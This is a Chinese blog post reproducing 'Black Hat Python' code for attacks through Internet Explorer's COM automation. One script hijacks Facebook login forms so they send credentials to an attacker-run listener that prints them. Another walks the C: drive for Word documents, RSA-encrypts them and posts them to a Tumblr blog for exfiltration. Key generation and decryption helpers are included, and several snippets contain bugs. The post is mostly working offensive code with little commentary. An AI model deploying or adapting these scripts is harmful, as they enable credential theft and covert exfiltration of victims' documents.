• Python黑帽子:浏览器的中间人攻击


    基于浏览器的中间人攻击

    #coding=utf-8
    import win32com.client
    import time
    import urlparse
    import urllib
    
    data_receiver = "http://localhost:8080/"
    
    target_sites = {}
    target_sites["www.facebook.com"] = {
        "logout_url" : None,
        "logout_form" : "logout_form",
        "login_form_index" : 0,
        "owned" : False
    }
    
    #IE浏览器类的ID号
    clsid = '{9BA05972-F6A8-11CF-A442-00A0C90A8F39}'
    
    windows = win32com.client.Dispatch(clsid)
    
    while True:
        for browser in windows:
            url = urlparse.urlparse(browser.LocationUrl)
            if url.hostname in target_sites:
                if target_sites[url.hostname]["owned"]:
                    continue
                #如果有一个URL,我们可以重定向
                if target_sites[url.hostname]["logout_url"]:
                    browser.Navigate(target_sites[url.hostname]["logout_url"])
                    wait_for_browser(browser)
                else:
                    #检索文件中的所有元素
                    full_doc = browser.Document.all
                    #
                    for i in full_doc:
                        try:
                            #找到退出登录的表单并提交
                            if i.id == target_sites[url.hostname]["logout_url"]:
                                i.submit()
                                wait_for_browser(browser)
                        except:
                            pass
    
                #现在来修改登录表单
                try:
                    login_index = target_sites[url.hostname]["login_form_index"]
                    login_page = urllib.quote(browser.LocationUrl)
                    browser.Document.forms[login_index].action = "%s%s"%(data_receiver,login_page)
                    target_sites[url.hostname]["owned"] = True
                except:
                    pass
        time.sleep(5)
    
    def wait_for_browser(browser):
        #等待浏览器加载完一个页面
        while browser.ReadyState != 4 and browser.ReadyState != "complete":
            time.sleep(0.1)
    
        return

    创建接收服务器

    import SimpleHTTPServer
    import SocketServer
    import urllib
    
    class CredRequestHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
        """docstring for CredRequestHandler"""
        def do_POST(self):
            content_length = int(self.headers['Content-Length'])
            creds = self.rfile.read(content_length).decode('utf-8')
            print creds
            site = self.path[1:]
            self.send_response(301)
            self.send_headers('Location',urllib.unquote(site))
            self.end_headers()
    
    server = SocketServer.TCPServer(('0.0.0.0',8080),CredRequestHandler)
    server.serve_forever()

    利用IE的COM组件自动化技术窃取数据

    keygen.py:

    #!/usr/bin/python
    from Crypto.PublicKey import RSA
    
    new_key = RSA.generate(2048,e=65537)
    public_key = new_key.publickey().exportKey("PEM")
    private_key = new_key.exportKey("PEM")
    
    print public_key
    print private_key

    decrypto.py:

    #coding=utf-8  
    import zlib  
    import base64  
    from Crypto.PublicKey import RSA  
    from Crypto.Cipher import PKCS1_OAEP  
      
    private_key = "输入产生的公钥"  
      
    rsakey = RSA.importKey(private_key)  
    rsakey = PKCS1_OAEP.new(rsakey)  
      
    chunk_size = 256  
    offset = 0  
    decrypted = ""  
    encrypted = base64.b64decode(encrypted)  
      
    while offset < len(encrypted):  
        decrypted += rsakey.decrypted(encrypted[offset:offset+chunk_size])  
        offset += chunk_size  
      
    #解压负载  
    plaintext = zlib.decompress(decrypted)  
      
    print plaintext  

     这段代码用于将赖在tumblr的编码文件进行base64解码,从而形成原始的明文字符串,最后进行负载解压。

    ie_exfil.py:

    #coding=utf-8
    import win32com.client
    import os
    import fnmatch
    import time
    import random
    import zlib
    from Crypto.PublicKey import RSA
    from Crypto.Cipher import PKCS1_OAEP
    
    doc_type = ".doc"
    username = "lyshark"
    password = "123123123"
    
    public_key = "公钥"
    
    def wait_for_browser(browser):
        #等待浏览器加载完一个页面
        while browser.ReadyState != 4 and browser.ReadyState != "complete":
            time.sleep(0.1)
    
        return
    
    def encrypt_string(plaintext):
        chunk_size = 256
        print "Compressing: %d bytes"%len(plaintext)
        plaintext = zlib.compress(plaintext)
    
        print "Encrypting %d bytes"%len(plaintext)
    
        rsakey = RSA.importKey(public_key)
        rsakey = PKCS1_OAEP.new(rsakey)
    
        encrypted = ""
        offset = 0
    
        while offset < len(plaintext):
            chunk = plaintext[offset:offset+chunk_size]
    
            if len(chunk) % chunk_size != 0:
                chunk += " " * (chunk_size - len(chunk))
    
            encrypted += rsakey.encrypt(chunk)
            offset += chunk_size
    
        encrypted = encrypted.encode("base64")
    
        print "Base64 encoded crypto: %d"%len(encrypted)
    
        return encrypted
    
    def encrypt_post(filename):
        #打开并读取文件
        fd = open(filename,"rb")
        contents = fd.read()
        fd.close()
    
        encrypted_title = encrypt_string(filename)
        encrypted_body = encrypt_string(contents)
    
        return encrypted_title,encrypted_body
    
    def random_sleep():
        time.sleep(random.randint(5,10))
        return
    
    def login_to_tumblr(ie):
        #解析文档中的所有元素
        full_doc = ie.Document.all
    
        #迭代每个元素来查找登录表单
        for i in full_doc:
            if i.id == "signup_email":
                i.setAttribute("value",username)
            elif i.id == "signup_password":
                i.setAttribute("value",password)
    
        random_sleep()
    
        try:
            #你会遇到不同的登陆主页
            if  ie.Document.forms[0].id == "signup_form":
                ie.Document.forms[0].submit()
            else:
                ie.Document.forms[1].submit()
        except IndexError, e:
            pass
    
        random_sleep()
    
        #登陆表单是登录页面中的第二个表单
        wait_for_browser(ie)
    
        return
    
    def post_to_tumblr(ie,title,post):
        full_doc = ie.Document.all
    
        for i in full_doc:
            if i.id == "post_one":
                i.setAttribute("value",title)
                title_box = i
                i.focus()
            elif i.id == "post_two":
                i.setAttribute("innerHTML",post)
                print "Set text area"
                i.focus()
            elif i.id == "create_post":
                print "Found post button"
                post_form = i
                i.focus()
    
        #将浏览器的焦点从输入主体内容的窗口上移开
        random_sleep()
        title_box.focus()
        random_sleep()
    
        #提交表单
        post_form.children[0].click()
        wait_for_browser(ie)
    
        random_sleep()
    
        return
    
    def exfiltrate(document_path):
        ie = win32com.client.Dispatch("InternetExplorer.Application")
        ie.Visible = 1
    
        #访问tumblr站点并登录
        ie.Navigate("https://www.tumblr.com/login")
        wait_for_browser(ie)
    
        print "Logging in..."
        login_to_tumblr(ie)
        print "Logged in...navigating"
    
        ie.Navigate("https://www.tumblr.com/new/text")
        wait_for_browser(ie)
    
        #加密文件
        title,body = encrypt_post(document_path)
    
        print "Creating new post..."
        post_to_tumblr(ie,title,body)
        print "Posted!"
    
        #销毁IE实例
        ie.Quit()
        ie = None
    
        return
    
    #用户文档检索的循环
    #注意:以下这段代码的第一行没有“tab”缩进
    for parent,directories,filenames in os.walk("C:\"):
        for filename in fnmatch.filter(filenames,"*%s"%doc_type):
            document_path = os.path.join(parent,filename)
            print "Found: %s"%document_path
            exfiltrate(document_path)
            raw_input("Continue?")

    代码用于捕获本地文件系统中的Word文档,并利用公钥对其进行加密,然后自动启动进程将加密的文档提交到一个位于tumblr.com站点的博客上

  • 相关阅读:
    网络
    分区
    JavaScript概述
    CSS样式属性
    css选择器
    CSS的引入方式
    css介绍
    HTML结构
    常用标签
    HTML介绍
  • 原文地址:https://www.cnblogs.com/LyShark/p/9102611.html
Copyright © 2020-2023  润新知